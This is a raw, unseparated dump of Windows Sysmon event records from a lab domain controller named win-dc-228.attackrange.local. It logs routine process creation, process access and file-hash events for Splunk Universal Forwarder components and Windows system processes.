Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A86D552CA481EFA4C25D895B66D2C10D,SHA256=0BA65313878CF86A8EBB6F55E4456C03C7EF05062493423B445BAC67A287C52C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201173Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:16.025{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA72F4EDC6B4236D6EE86210C7FC89EF,SHA256=A11AFD472C2C14AF212C62123983B5E613D3C135BFCDDCF8BB37863CF1B9BD4C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201184Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.650{5ABCFE62-E73D-6040-F74D-00000000AD01}34723392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201183Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.525{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E73D-6040-F74D-00000000AD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201182Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.525{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201181Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.525{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201180Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.525{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201179Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.525{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201178Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.525{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E73D-6040-F74D-00000000AD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201177Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.525{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E73D-6040-F74D-00000000AD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201176Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.526{5ABCFE62-E73D-6040-F74D-00000000AD01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002201175Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:11.987{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55191-false10.0.1.12-8000- 23542300x80000000000000002201174Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:17.041{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A103556E71450D7E3F236F1707F4C731,SHA256=54660BBE4305C299F4532F459B1FD752A8634DEEDEE586B4CE6F35673F21330E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201203Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.775{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E73E-6040-F94D-00000000AD01}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201202Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.775{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201201Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.775{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201200Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.775{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201199Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.775{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201198Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.775{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E73E-6040-F94D-00000000AD01}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201197Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.775{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E73E-6040-F94D-00000000AD01}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201196Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.776{5ABCFE62-E73E-6040-F94D-00000000AD01}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201195Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.525{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6D11BC00A062E14168B282054D119C2,SHA256=1904D54BEBB45DB8CC5900A464CA40EA12BF5ECA6669D54CC9CC360DD042F60E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201194Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.291{5ABCFE62-E73E-6040-F84D-00000000AD01}21004496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201193Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.150{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E73E-6040-F84D-00000000AD01}2100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201192Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.150{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201191Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.150{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201190Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.150{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201189Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.150{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201188Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.150{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E73E-6040-F84D-00000000AD01}2100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201187Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.150{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E73E-6040-F84D-00000000AD01}2100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201186Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:18.151{5ABCFE62-E73E-6040-F84D-00000000AD01}2100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201185Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 